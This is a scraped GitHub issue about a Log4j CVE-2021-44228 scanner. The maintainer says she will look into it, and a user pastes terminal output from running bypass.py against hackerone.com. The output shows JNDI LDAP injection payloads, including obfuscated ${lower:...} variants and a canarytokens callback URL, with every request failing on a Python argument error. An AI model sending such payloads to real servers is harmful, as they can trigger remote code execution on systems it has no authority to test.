cyberqueenmeg
commented
1 year ago Hi,
For whatever reason, I'm just seeing this now. Didn't get an email about it. I'll look into this later today
Open r3l1c7 opened 2 years ago
cyberqueenmeg
commented
1 year ago Hi,
For whatever reason, I'm just seeing this now. Didn't get an email about it. I'll look into this later today
root@rootvps:~/tools/log4j-bypass# python3 bypass.py -u https://hackerone.com --callback-url "${jndi:ldap://x${hostName}.L4J.9dyildfdvpl3o0jlxm.canarytokens.com/a}" --header "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
[•] CVE-2021-44228 - Apache Log4j RCE Exception Scanner [•] Scanner provided by CyberQueenMeg [•] If you are running this using the BlackArch library and scanning a list of URLs, put them in /usr/share/log4j-bypass to get the script to scan them [•] Using [] for DNS callback. [%] Checking for Log4j RCE CVE-2021-44228 and bypasses. [•] URL: https://hackerone.com [•] PAYLOAD: ${jndi:ldap://] EXCEPTION: request() got an unexpected keyword argument 'header' EXCEPTION: request() got an unexpected keyword argument 'header' EXCEPTION: request() got an unexpected keyword argument 'header' [•] PAYLOAD: {${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://} EXCEPTION: request() got an unexpected keyword argument 'header' EXCEPTION: request() got an unexpected keyword argument 'header' EXCEPTION: request() got an unexpected keyword argument 'header'